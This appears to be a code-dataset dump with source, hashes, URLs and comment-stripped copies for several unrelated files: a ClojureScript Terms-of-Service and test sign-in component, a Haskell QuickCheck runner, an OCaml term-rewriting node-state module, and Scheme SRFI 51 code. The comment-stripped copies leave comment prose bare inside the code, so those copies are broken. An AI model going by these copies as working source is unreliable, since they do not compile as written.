[buttons/Button {:text "Accept" :onClick (:submit-tos @state)}]]]]
[:div {}
[:div {:style {:color (:state-exception style/colors) :paddingBottom "1rem"}}
"Error loading Terms of Service information. Please try again later."]
[:table {:style {:color (:text-lighter style/colors)}}
[:tbody {:style {}}
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "What went wrong:"] [:td {} (:message error)]]
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "Status code:"] [:td {} (:statusCode error)]]]]])]))
:component-did-mount
(fn [{:keys [state this]}]
(this :-get-status))
:-get-tos-text
(fn [{:keys [props state]}]
(let [{:keys [on-success]} props]
(endpoints/tos-get-text
(fn [{:keys [success? status-code raw-response]}]
(swap! state assoc :tos
(if success?
raw-response
(str "Could not load Terms of Service; please read it at "
(str (config/terra-base-url) "/#terms-of-service")
".")))))))
:-get-status
(fn [{:keys [props state this]}]
(let [{:keys [on-success]} props
update-status #(this :-get-status)]
(endpoints/tos-get-status
(fn [{:keys [success? status-code get-parsed-response raw-response]}]
(if (= "true" raw-response)
(on-success)
(do
(this :-get-tos-text)
(swap! state assoc :submit-tos #(endpoints/tos-set-status "app.terra.bio/#terms-of-service" update-status))
(case status-code
200 (swap! state assoc :error :not-agreed)
403 means the user declined the TOS ( or has invalid token ? Need to distinguish )
403 (swap! state assoc :error :declined)
(swap! state assoc :error (handle-server-error status-code get-parsed-response)))))))))})
(defn reject-tos [on-done] (endpoints/tos-set-status false on-done))
(defn force-signed-in [{:keys [on-sign-in on-sign-out on-error]}]
(fn [auth-token extra-on-sign-in]
(ajax/call {:url (str "="
(js/encodeURIComponent auth-token))
:on-done
(fn [{:keys [status-code success? get-parsed-response raw-response]}]
use console.warn to make sure logs are captured by selenium
(js/console.warn (str "force-signed-in: <" success? "> " raw-response))
(if success?
(let [{:keys [email sub]} (get-parsed-response)
auth2 (clj->js
{:currentUser
{:get
(constantly
(clj->js
{:getAuthResponse
(constantly (clj->js {:access_token auth-token}))
:getBasicProfile
(constantly (clj->js {:getEmail (constantly email)
:getId (constantly sub)}))
:hasGrantedScopes (constantly true)}))
:listen (constantly nil)}
:signOut on-sign-out})]
(user/set-google-auth2-instance! auth2)
(on-sign-in)
(when (some? extra-on-sign-in)
(extra-on-sign-in)))
(on-error {:status status-code :response raw-response})))})))
(defn render-forced-sign-in-error [error]
[:div {}
[:div {} "Status: " (:status error)]
[:div {} "Response: " (:response error)]])
(defn add-nav-paths []
(nav/defpath
:policy
{:public? true
:component PolicyPage
:regex #"policy"
:make-props (fn [_] {})
:make-path (fn [] "policy")}))
|
47a85b0d9ca8279117649830004b4d4337649bf8b87be37993fbcf2ffaf9660c | PhDP/Akarui | Properties.hs | import Test.QuickCheck
import Test.QuickCheck.Test (isSuccess)
import Control.Monad
import System.Exit (exitFailure)
import PredicateSpec
import FOLSpec
-- | Run every QuickCheck property suite and exit with a failure code if
-- any of them does not succeed.
main :: IO ()
main = do
  results <- sequence
    [ quickCheckResult prop_predicate_eq_itself
    , quickCheckResult prop_predicate_cmp_itself
    , quickCheckResult prop_predicate_ord
    -- , quickCheckResult prop_parsing_back -- Will be reinstated once I figure out how to handle top/bot printing.
    , quickCheckResult prop_fol_ord
    , quickCheckResult prop_fol_self_eq
    ]
  unless (all isSuccess results) exitFailure
| null | https://raw.githubusercontent.com/PhDP/Akarui/4ad888d011f7115677e8f9ba18887865f5150746/tests/Properties.hs | haskell | , quickCheckResult prop_parsing_back -- Will be reinstated once I figure out how to handle top/bot printing. | import Test.QuickCheck
import Test.QuickCheck.Test (isSuccess)
import Control.Monad
import System.Exit (exitFailure)
import PredicateSpec
import FOLSpec
main :: IO ()
main = do
let
tests =
[ quickCheckResult prop_predicate_eq_itself
, quickCheckResult prop_predicate_cmp_itself
, quickCheckResult prop_predicate_ord
, quickCheckResult prop_fol_ord
, quickCheckResult prop_fol_self_eq
]
success <- fmap (all isSuccess) . sequence $ tests
unless success exitFailure
|
bf0f1d313a1060ec6d7c9d9325ccc51d4830c95b8408dcc489a2c5ad6332e752 | bytekid/mkbtt | nodeState.ml | Copyright 2010
* GNU Lesser General Public License
*
* This file is part of MKBtt .
*
* is free software : you can redistribute it and/or modify it under
* the terms of the GNU Lesser General Public License as published by the
* Free Software Foundation , either version 3 of the License , or ( at your
* option ) any later version .
*
* is distributed in the hope that it will be useful , but WITHOUT
* ANY WARRANTY ; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE . See the GNU Lesser General Public
* License for more details .
*
* You should have received a copy of the GNU Lesser General Public
* License along with MKBtt . If not , see < / > .
* GNU Lesser General Public License
*
* This file is part of MKBtt.
*
* MKBtt is free software: you can redistribute it and/or modify it under
* the terms of the GNU Lesser General Public License as published by the
* Free Software Foundation, either version 3 of the License, or (at your
* option) any later version.
*
* MKBtt is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
* License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with MKBtt. If not, see </>.
*)
* Functions related to node state in global monad .
@author
@since 2010/10/12
@author Sarah Winkler
@since 2010/10/12 *)
(*** OPENS ***************************************************************)
open Util;;
* * SUBMODULES ( 1 ) * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
module Term = U.Term;;
module W = World;;
module N = IndexedNode;;
module NI = NodeTermIndexx;;
module Monad = W.Monad;;
(*** OPENS ***************************************************************)
open Monad;;
open World;;
(*** FUNCTIONS ***********************************************************)
" % s\n " s ;
(* Monadic accessors for the open and closed node lists stored in the
   global node state. *)
let open_nodes = W.get_node_state >>= fun c -> return c.open_nodes
let closed_nodes = W.get_node_state >>= fun c -> return c.closed_nodes
(* True iff at least one open node carries a non-empty label set, i.e.
   there is still work for the completion procedure. *)
let non_empty_open_nodes_exist =
  open_nodes >>= fun o ->
  filter N.has_non_empty_labels o >>= fun o' ->
  return (not(List.is_empty o'))
;;
(* All known nodes: the union of the closed and open node lists. *)
let all_nodes =
  W.get_node_state >>= fun st ->
  return (List.union st.closed_nodes st.open_nodes)
;;
(* Replace the open-node list wholesale. *)
let set_open ns =
  W.get_node_state >>= fun st ->
  W.set_node_state {st with open_nodes = ns}
;;
(* Merge the given nodes into the open-node list. *)
let add_open ns =
  W.get_node_state >>= fun st ->
  W.set_node_state {st with open_nodes = List.union ns st.open_nodes}
;;
(* Drop a single node from the open-node list. *)
let remove_open n =
  W.get_node_state >>= fun st ->
  W.set_node_state {st with open_nodes = List.remove n st.open_nodes}
;;
(* Drop a single node from the closed-node list. *)
let remove_closed n =
  W.get_node_state >>= fun st ->
  W.set_node_state {st with closed_nodes = List.remove n st.closed_nodes}
;;
(* Insert node [n] into the node term index and merge it into the
   closed-node list. *)
let index_add_closed_node n =
  (*log2 "index_add_closed_node" >>*)
  NI.add_node n >>
  W.get_node_state >>= fun c ->
  W.set_node_state {c with closed_nodes=List.union [n] c.closed_nodes}
;;
(* Propagate a process split [s] to every node (open and closed) as well
   as to the completion-process bookkeeping and the goal state. *)
let split_state s =
  W.get_node_state >>= fun c ->
  iter (N.split s) c.open_nodes >>
  iter (N.split s) c.closed_nodes >>
  CompletionProcessx.split_state s >>
  GoalState.split s
;;
(*let rewrite_index = M.NodeTermIndex.rewrite_index*)
(* Restrict the labels of all nodes, and the goal state, to the single
   process [p]. *)
let restrict_to_process p =
  W.get_node_state >>= fun c ->
  iter (N.restrict_to_process p) c.open_nodes >>
  iter (N.restrict_to_process p) c.closed_nodes >>
  GoalState.restrict_to_process p
;;
(* Remove the processes [ps] from every node's labels, from the
   completion-process registry and from the goal state. *)
let remove_processes ps =
  W.get_node_state >>= fun c ->
  iter (N.remove_processes ps) c.open_nodes >>
  iter (N.remove_processes ps) c.closed_nodes >>
  CompletionProcessx.remove ps >>
  GoalState.remove_processes ps
;;
(* Rule projection of process [p] restricted to the closed nodes. *)
let project_r_closed p =
  closed_nodes >>= fun ns -> NodeSet.project_r_closed p ns
;;
(* Equation projection of process [p] restricted to the closed nodes. *)
let project_e_closed p =
  closed_nodes >>= fun ns -> NodeSet.project_e_closed p ns
;;
(* Closed nodes whose E/R components contain process [p]. *)
let er_contain_closed p =
  closed_nodes >>= fun ns -> filter (N.er_contains_closed p) ns
;;
(* Project the E, R and C components of process [p] from all nodes and
   return them as the triple (e, r, c). *)
let get_projections p =
  all_nodes >>= fun ns -> NodeSet.project_e p ns >>= fun e ->
  NodeSet.project_r p ns >>= fun r ->
  NodeSet.project_c p ns >>= fun c ->
  return (e,r,c)
;;
(* As [get_projections], but uses the [_with_class] projection variants;
   presumably each element also carries its equivalence class -- confirm
   against NodeSet. *)
let get_projections_with_class p =
  all_nodes >>= fun ns ->
  NodeSet.project_e_with_class p ns >>= fun e ->
  NodeSet.project_r_with_class p ns >>= fun r ->
  NodeSet.project_c_with_class p ns >>= fun c ->
  return (e,r,c)
;;
(* Build a rewrite index containing only node [i]: both terms (s, t) of
   the node are inserted, each paired with (i, b) where the boolean
   presumably marks the term's orientation within the node -- confirm
   against NodeTermIndexx. A term is only inserted if
   [NI.indexing_required] approves it relative to the other term. *)
let single_rindex i =
  let add (t,v) s idx =
    NI.indexing_required t s v >>= fun b ->
    if b then NI.insert_one idx (t,v)
    else return idx
  in
  N.data i >>= fun (s, t) ->
  NI.empty_rindex >>=
  add (s,(i, true)) t >>= add (t,(i, false)) s
;;
| null | https://raw.githubusercontent.com/bytekid/mkbtt/c2f8e0615389b52eabd12655fe48237aa0fe83fd/src/mkbtt/nodeState.ml | ocaml | ** OPENS **************************************************************
** OPENS **************************************************************
** FUNCTIONS **********************************************************
log2 "index_add_closed_node" >>
let rewrite_index = M.NodeTermIndex.rewrite_index | Copyright 2010
* GNU Lesser General Public License
*
* This file is part of MKBtt .
*
* is free software : you can redistribute it and/or modify it under
* the terms of the GNU Lesser General Public License as published by the
* Free Software Foundation , either version 3 of the License , or ( at your
* option ) any later version .
*
* is distributed in the hope that it will be useful , but WITHOUT
* ANY WARRANTY ; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE . See the GNU Lesser General Public
* License for more details .
*
* You should have received a copy of the GNU Lesser General Public
* License along with MKBtt . If not , see < / > .
* GNU Lesser General Public License
*
* This file is part of MKBtt.
*
* MKBtt is free software: you can redistribute it and/or modify it under
* the terms of the GNU Lesser General Public License as published by the
* Free Software Foundation, either version 3 of the License, or (at your
* option) any later version.
*
* MKBtt is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
* License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with MKBtt. If not, see </>.
*)
* Functions related to node state in global monad .
@author
@since 2010/10/12
@author Sarah Winkler
@since 2010/10/12 *)
open Util;;
* * SUBMODULES ( 1 ) * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
module Term = U.Term;;
module W = World;;
module N = IndexedNode;;
module NI = NodeTermIndexx;;
module Monad = W.Monad;;
open Monad;;
open World;;
" % s\n " s ;
let open_nodes = W.get_node_state >>= fun c -> return c.open_nodes
let closed_nodes = W.get_node_state >>= fun c -> return c.closed_nodes
let non_empty_open_nodes_exist =
open_nodes >>= fun o ->
filter N.has_non_empty_labels o >>= fun o' ->
return (not(List.is_empty o'))
;;
(* All nodes known to the working state: the closed and open node lists
   merged with List.union (so a node present in both appears once). *)
let all_nodes =
 W.get_node_state >>= fun c ->
 return (List.union c.closed_nodes c.open_nodes)
;;
(* Replace the open-node list wholesale. *)
let set_open ns =
 W.get_node_state >>= fun c ->
 W.set_node_state {c with open_nodes = ns}
;;
(* Add nodes to the open list, deduplicating against the current one. *)
let add_open ns =
 W.get_node_state >>= fun c ->
 W.set_node_state {c with open_nodes = List.union ns c.open_nodes}
;;
(* Delete a single node from the open list. *)
let remove_open n =
 W.get_node_state >>= fun c ->
 W.set_node_state {c with open_nodes = List.remove n c.open_nodes}
;;
(* Delete a single node from the closed list. *)
let remove_closed n =
 W.get_node_state >>= fun c ->
 W.set_node_state {c with closed_nodes = List.remove n c.closed_nodes}
;;
(* Register [n] in the node index NI, then record it as closed. *)
let index_add_closed_node n =
 NI.add_node n >>
 W.get_node_state >>= fun c ->
 W.set_node_state {c with closed_nodes=List.union [n] c.closed_nodes}
;;
(* Propagate a process split [s] to every open and closed node, then to
   the completion-process bookkeeping and the goal state. *)
let split_state s =
 W.get_node_state >>= fun c ->
 iter (N.split s) c.open_nodes >>
 iter (N.split s) c.closed_nodes >>
 CompletionProcessx.split_state s >>
 GoalState.split s
;;
(* Restrict every node and the goal state to the single process [p]. *)
let restrict_to_process p =
 W.get_node_state >>= fun c ->
 iter (N.restrict_to_process p) c.open_nodes >>
 iter (N.restrict_to_process p) c.closed_nodes >>
 GoalState.restrict_to_process p
;;
(* Remove the processes [ps] everywhere they are tracked: in every node,
   in the completion-process registry, and in the goal state. *)
let remove_processes ps =
 W.get_node_state >>= fun c ->
 iter (N.remove_processes ps) c.open_nodes >>
 iter (N.remove_processes ps) c.closed_nodes >>
 CompletionProcessx.remove ps >>
 GoalState.remove_processes ps
;;
(* R-projection of the closed nodes for process [p]. *)
let project_r_closed p =
 closed_nodes >>= NodeSet.project_r_closed p
;;
(* E-projection of the closed nodes for process [p]. *)
let project_e_closed p =
 closed_nodes >>= NodeSet.project_e_closed p
;;
(* Closed nodes accepted by N.er_contains_closed for [p]
   (NOTE(review): exact ER-containment semantics live in N). *)
let er_contain_closed p =
 closed_nodes >>= filter (N.er_contains_closed p)
;;
(* The (E, R, C) projections of all nodes for process [p]. *)
let get_projections p =
 all_nodes >>= fun ns -> NodeSet.project_e p ns >>= fun e ->
 NodeSet.project_r p ns >>= fun r ->
 NodeSet.project_c p ns >>= fun c ->
 return (e,r,c)
;;
(* As get_projections, but using the *_with_class projection variants. *)
let get_projections_with_class p =
 all_nodes >>= fun ns ->
 NodeSet.project_e_with_class p ns >>= fun e ->
 NodeSet.project_r_with_class p ns >>= fun r ->
 NodeSet.project_c_with_class p ns >>= fun c ->
 return (e,r,c)
;;
(* Build an rindex holding just node [i]: each orientation (s -> t and
   t -> s) is inserted only when NI.indexing_required approves it. *)
let single_rindex i =
 let add (t,v) s idx =
  NI.indexing_required t s v >>= fun b ->
  if b then NI.insert_one idx (t,v)
  else return idx
 in
 N.data i >>= fun (s, t) ->
 NI.empty_rindex >>=
 add (s,(i, true)) t >>= add (t,(i, false)) s
;;
|
bb7e19ed8500a49799fc5e6003dfd183018f859ac969d35a108f385755fd18ec | arcfide/chez-srfi | srfi-51-impl.scm | ;;
;; Reference implementation of SRFI 51
;;
;; Copyright (C) Joo ChurlSoo (2004). All Rights Reserved.
;;
;; Permission is hereby granted, free of charge, to any person obtaining a copy
;; of this software and associated documentation files (the "Software"), to
;; deal in the Software without restriction, including without limitation the
;; rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
;; sell copies of the Software, and to permit persons to whom the Software is
;; furnished to do so, subject to the following conditions:
;;
;; The above copyright notice and this permission notice shall be included in
;; all copies or substantial portions of the Software.
;;
;; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
;; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
;; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
;; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
;; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
;; FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
;; IN THE SOFTWARE.
;;
;; (rest-values [caller] rest-list [option default ...])
;;
;; Destructures REST-LIST against the DEFAULT specs and returns the
;; selected arguments as multiple values (SRFI 51).
;;
;; A CALLER for error messages is recognised when the first operand is
;; followed by something that is not an option (not a boolean, integer,
;; + or -): in that case the first operand is the caller (used verbatim
;; when it is a string, otherwise wrapped in a list and appended to the
;; error irritants) and the next operand is the actual rest-list.
;;
;; OPTION selects the matching mode -- see the comments on the cond
;; branches below.  In the checked modes every default must be a pair:
;; a list of acceptable values (matched with member) or a pair whose
;; cdr is a predicate; the car is the fallback value.
(define (rest-values rest . default)
  (let* ((caller (if (or (null? default)
                         (boolean? (car default))
                         (integer? (car default))
                         (memq (car default) (list + -)))
                     '()
                     (if (string? rest) rest (list rest))))
         (rest-list (if (null? caller) rest (car default)))
         (rest-length (if (list? rest-list)
                          (length rest-list)
                          (if (string? caller)
                              (error caller rest-list 'rest-list
                                     '(list? rest-list))
                              (apply error "bad rest list" rest-list 'rest-list
                                     '(list? rest-list) caller))))
         (default (if (null? caller) default (cdr default)))
         (default-list (if (null? default) default (cdr default)))
         (default-length (length default-list))
         ;; NUMBER normalises the option: #t, 'false (for #f), a checked
         ;; positive/negative integer (after bounds validation), + or -.
         (number
          (and (not (null? default))
               (let ((option (car default)))
                 (or (and (integer? option)
                          (or (and (> rest-length (abs option))
                                   (if (string? caller)
                                       (error caller rest-list 'rest-list
                                              `(<= (length rest-list)
                                                   ,(abs option)))
                                       (apply error "too many arguments"
                                              rest-list 'rest-list
                                              `(<= (length rest-list)
                                                   ,(abs option))
                                              caller)))
                              (and (> default-length (abs option))
                                   (if (string? caller)
                                       (error caller default-list
                                              'default-list
                                              `(<= (length default-list)
                                                   ,(abs option)))
                                       (apply error "too many defaults"
                                              default-list 'default-list
                                              `(<= (length default-list)
                                                   ,(abs option))
                                              caller)))
                              option))
                     (eq? option #t)
                     (and (not option) 'false)
                     (and (eq? option +) +)
                     (and (eq? option -) -)
                     (if (string? caller)
                         (error caller option 'option
                                '(or (boolean? option)
                                     (integer? option)
                                     (memq option (list + -))))
                         (apply error "bad optional argument" option 'option
                                '(or (boolean? option)
                                     (integer? option)
                                     (memq option (list + -)))
                                caller)))))))
    (cond
     ;; #t / #f: content-based (order-insensitive) matching.  Each rest
     ;; argument may satisfy any remaining default spec; unmatched specs
     ;; yield their fallback (car).  With #t, leftover rest arguments are
     ;; an error; with #f they are appended to the result.
     ((or (eq? #t number) (eq? 'false number))
      (and (not (every pair? default-list))
           (if (string? caller)
               (error caller default-list 'default-list
                      '(every pair? default-list))
               (apply error "bad default list" default-list 'default-list
                      '(every pair? default-list) caller)))
      (let loop ((rest-list rest-list)
                 (default-list default-list)
                 (result '()))
        (if (null? default-list)
            (if (null? rest-list)
                (apply values (reverse result))
                (if (eq? #t number)
                    (if (string? caller)
                        (error caller rest-list 'rest-list '(null? rest-list))
                        (apply error "bad argument" rest-list 'rest-list
                               '(null? rest-list) caller))
                    (apply values (append-reverse result rest-list))))
            (if (null? rest-list)
                (apply values (append-reverse result (map car default-list)))
                (let ((default (car default-list)))
                  (let lp ((rest rest-list)
                           (head '()))
                    (if (null? rest)
                        (loop (reverse head)
                              (cdr default-list)
                              (cons (car default) result))
                        (if (list? default)
                            (if (member (car rest) default)
                                (loop (append-reverse head (cdr rest))
                                      (cdr default-list)
                                      (cons (car rest) result))
                                (lp (cdr rest) (cons (car rest) head)))
                            (if ((cdr default) (car rest))
                                (loop (append-reverse head (cdr rest))
                                      (cdr default-list)
                                      (cons (car rest) result))
                                (lp (cdr rest) (cons (car rest) head)))))))))))
     ;; positive integer / +: positional checking.  Each rest argument
     ;; must satisfy the default spec at the same position; missing
     ;; trailing arguments are filled from the fallbacks (car of spec).
     ((or (and (integer? number) (> number 0))
          (eq? number +))
      (and (not (every pair? default-list))
           (if (string? caller)
               (error caller default-list 'default-list
                      '(every pair? default-list))
               (apply error "bad default list" default-list 'default-list
                      '(every pair? default-list) caller)))
      (let loop ((rest rest-list)
                 (default default-list))
        (if (or (null? rest) (null? default))
            (apply values
                   (if (> default-length rest-length)
                       (append rest-list
                               (map car (list-tail default-list rest-length)))
                       rest-list))
            (let ((arg (car rest))
                  (par (car default)))
              (if (list? par)
                  (if (member arg par)
                      (loop (cdr rest) (cdr default))
                      (if (string? caller)
                          (error caller arg 'arg `(member arg ,par))
                          (apply error "unmatched argument"
                                 arg 'arg `(member arg ,par) caller)))
                  (if ((cdr par) arg)
                      (loop (cdr rest) (cdr default))
                      (if (string? caller)
                          (error caller arg 'arg `(,(cdr par) arg))
                          (apply error "incorrect argument"
                                 arg 'arg `(,(cdr par) arg) caller))))))))
     ;; negative integer / - / no option: no checking at all; missing
     ;; trailing arguments are filled with the raw default values.
     (else
      (apply values (if (> default-length rest-length)
                        (append rest-list (list-tail default-list rest-length))
                        rest-list))))))
;; (arg-and [caller] arg (test ...) ...)
;; Evaluates each (test ...) in order and raises an "incorrect argument"
;; error -- reporting ARG's value, its name, and the failing test -- as
;; soon as one yields #f.  ARG must be a symbol (checked at expansion
;; via a run-time symbol? test).  Any extra first operand is treated as
;; a CALLER: used as the error message when it is a string, otherwise
;; appended to the error irritants.
(define-syntax arg-and
  (syntax-rules()
    ((arg-and arg (a1 a2 ...) ...)
     (and (or (symbol? 'arg)
              (error "bad syntax" 'arg '(symbol? 'arg)
                     '(arg-and arg (a1 a2 ...) ...)))
          (or (a1 a2 ...)
              (error "incorrect argument" arg 'arg '(a1 a2 ...)))
          ...))
    ((arg-and caller arg (a1 a2 ...) ...)
     (and (or (symbol? 'arg)
              (error "bad syntax" 'arg '(symbol? 'arg)
                     '(arg-and caller arg (a1 a2 ...) ...)))
          (or (a1 a2 ...)
              (if (string? caller)
                  (error caller arg 'arg '(a1 a2 ...))
                  (error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
          ...))))
;; accessory macro for arg-ands
;; Like arg-and but always takes the caller first.  The second rule
;; (with an extra leading operand bound to the pattern variable `null')
;; lets arg-ands forward a placeholder in that position; note that its
;; "bad syntax" report quotes the form without the placeholder.
(define-syntax caller-arg-and
  (syntax-rules()
    ((caller-arg-and caller arg (a1 a2 ...) ...)
     (and (or (symbol? 'arg)
              (error "bad syntax" 'arg '(symbol? 'arg)
                     '(caller-arg-and caller arg (a1 a2 ...) ...)))
          (or (a1 a2 ...)
              (if (string? caller)
                  (error caller arg 'arg '(a1 a2 ...))
                  (error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
          ...))
    ((caller-arg-and null caller arg (a1 a2 ...) ...)
     (and (or (symbol? 'arg)
              (error "bad syntax" 'arg '(symbol? 'arg)
                     '(caller-arg-and caller arg (a1 a2 ...) ...)))
          (or (a1 a2 ...)
              (if (string? caller)
                  (error caller arg 'arg '(a1 a2 ...))
                  (error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
          ...))))
;; (arg-ands [common caller] (arg (test ...) ...) ...)
;; Chains several arg-and clauses with `and'; the `common' variant
;; shares one caller across every clause via caller-arg-and.
(define-syntax arg-ands
  (syntax-rules (common)
    ((arg-ands (a1 a2 ...) ...)
     (and (arg-and a1 a2 ...) ...))
    ((arg-ands common caller (a1 a2 ...) ...)
     (and (caller-arg-and caller a1 a2 ...) ...))))
;; (arg-or [caller] arg (test ...) ...)
;; Dual of arg-and: raises an "incorrect argument" error as soon as one
;; of the (test ...) expressions yields a true value.  ARG must be a
;; symbol; an optional CALLER is folded into the error message exactly
;; as in arg-and.
(define-syntax arg-or
  (syntax-rules()
    ((arg-or arg (a1 a2 ...) ...)
     (or (and (not (symbol? 'arg))
              (error "bad syntax" 'arg '(symbol? 'arg)
                     '(arg-or arg (a1 a2 ...) ...)))
         (and (a1 a2 ...)
              (error "incorrect argument" arg 'arg '(a1 a2 ...)))
         ...))
    ((arg-or caller arg (a1 a2 ...) ...)
     (or (and (not (symbol? 'arg))
              (error "bad syntax" 'arg '(symbol? 'arg)
                     '(arg-or caller arg (a1 a2 ...) ...)))
         (and (a1 a2 ...)
              (if (string? caller)
                  (error caller arg 'arg '(a1 a2 ...))
                  (error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
         ...))))
;; accessory macro for arg-ors
;; Caller-first variant of arg-or; the second rule accepts a leading
;; placeholder operand (pattern variable `null') so arg-ors can always
;; pass a caller through.
(define-syntax caller-arg-or
  (syntax-rules()
    ((caller-arg-or caller arg (a1 a2 ...) ...)
     (or (and (not (symbol? 'arg))
              (error "bad syntax" 'arg '(symbol? 'arg)
                     '(caller-arg-or caller arg (a1 a2 ...) ...)))
         (and (a1 a2 ...)
              (if (string? caller)
                  (error caller arg 'arg '(a1 a2 ...))
                  (error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
         ...))
    ((caller-arg-or null caller arg (a1 a2 ...) ...)
     (or (and (not (symbol? 'arg))
              (error "bad syntax" 'arg '(symbol? 'arg)
                     '(caller-arg-or caller arg (a1 a2 ...) ...)))
         (and (a1 a2 ...)
              (if (string? caller)
                  (error caller arg 'arg '(a1 a2 ...))
                  (error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
         ...))))
;; (arg-ors [common caller] (arg (test ...) ...) ...)
;; Chains several arg-or clauses with `or'; the `common' variant shares
;; one caller across every clause via caller-arg-or.
(define-syntax arg-ors
  (syntax-rules (common)
    ((arg-ors (a1 a2 ...) ...)
     (or (arg-or a1 a2 ...) ...))
    ((arg-ors common caller (a1 a2 ...) ...)
     (or (caller-arg-or caller a1 a2 ...) ...))))
;; (err-and err expression ...)
;; Evaluates each EXPRESSION left to right and raises an error -- built
;; from ERR (the message when it is a string, otherwise an extra
;; irritant) and the quoted failing expression -- as soon as one yields
;; #f.
(define-syntax err-and
  (syntax-rules ()
    ((err-and err expression ...)
     (and (or expression
              (if (string? err)
                  (error err 'expression)
                  (error "false expression" 'expression err)))
          ...))))
;; (err-ands (err expression ...) ...)
;; One err-and per clause, each with its own ERR, combined with `and'.
(define-syntax err-ands
  (syntax-rules ()
    ((err-ands (err expression ...) ...)
     (and (err-and err expression ...)
          ...))))
;; (err-or err expression ...)
;; Dual of err-and: raises an error as soon as an EXPRESSION evaluates
;; to a true value.
(define-syntax err-or
  (syntax-rules ()
    ((err-or err expression ...)
     (or (and expression
              (if (string? err)
                  (error err 'expression)
                  (error "true expression" 'expression err)))
         ...))))
;; (err-ors (err expression ...) ...)
;; One err-or per clause, combined with `or'.
(define-syntax err-ors
  (syntax-rules ()
    ((err-ors (err expression ...) ...)
     (or (err-or err expression ...)
         ...))))
| null | https://raw.githubusercontent.com/arcfide/chez-srfi/96fb553b6ba0834747d5ccfc08c181aa8fd5f612/%253a51/srfi-51-impl.scm | scheme |
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
accessory macro for arg-ands
accessory macro for arg-ors | Reference implementation of SRFI 51
Copyright ( C ) ( 2004 ) . All Rights Reserved .
deal in the Software without restriction , including without limitation the
sell copies of the Software , and to permit persons to whom the Software is
all copies or substantial portions of the Software .
THE SOFTWARE IS PROVIDED " AS IS " , WITHOUT WARRANTY OF ANY KIND , EXPRESS OR
LIABILITY , WHETHER IN AN ACTION OF CONTRACT , TORT OR OTHERWISE , ARISING
(define (rest-values rest . default)
(let* ((caller (if (or (null? default)
(boolean? (car default))
(integer? (car default))
(memq (car default) (list + -)))
'()
(if (string? rest) rest (list rest))))
(rest-list (if (null? caller) rest (car default)))
(rest-length (if (list? rest-list)
(length rest-list)
(if (string? caller)
(error caller rest-list 'rest-list
'(list? rest-list))
(apply error "bad rest list" rest-list 'rest-list
'(list? rest-list) caller))))
(default (if (null? caller) default (cdr default)))
(default-list (if (null? default) default (cdr default)))
(default-length (length default-list))
(number
(and (not (null? default))
(let ((option (car default)))
(or (and (integer? option)
(or (and (> rest-length (abs option))
(if (string? caller)
(error caller rest-list 'rest-list
`(<= (length rest-list)
,(abs option)))
(apply error "too many arguments"
rest-list 'rest-list
`(<= (length rest-list)
,(abs option))
caller)))
(and (> default-length (abs option))
(if (string? caller)
(error caller default-list
'default-list
`(<= (length default-list)
,(abs option)))
(apply error "too many defaults"
default-list 'default-list
`(<= (length default-list)
,(abs option))
caller)))
option))
(eq? option #t)
(and (not option) 'false)
(and (eq? option +) +)
(and (eq? option -) -)
(if (string? caller)
(error caller option 'option
'(or (boolean? option)
(integer? option)
(memq option (list + -))))
(apply error "bad optional argument" option 'option
'(or (boolean? option)
(integer? option)
(memq option (list + -)))
caller)))))))
(cond
((or (eq? #t number) (eq? 'false number))
(and (not (every pair? default-list))
(if (string? caller)
(error caller default-list 'default-list
'(every pair? default-list))
(apply error "bad default list" default-list 'default-list
'(every pair? default-list) caller)))
(let loop ((rest-list rest-list)
(default-list default-list)
(result '()))
(if (null? default-list)
(if (null? rest-list)
(apply values (reverse result))
(if (eq? #t number)
(if (string? caller)
(error caller rest-list 'rest-list '(null? rest-list))
(apply error "bad argument" rest-list 'rest-list
'(null? rest-list) caller))
(apply values (append-reverse result rest-list))))
(if (null? rest-list)
(apply values (append-reverse result (map car default-list)))
(let ((default (car default-list)))
(let lp ((rest rest-list)
(head '()))
(if (null? rest)
(loop (reverse head)
(cdr default-list)
(cons (car default) result))
(if (list? default)
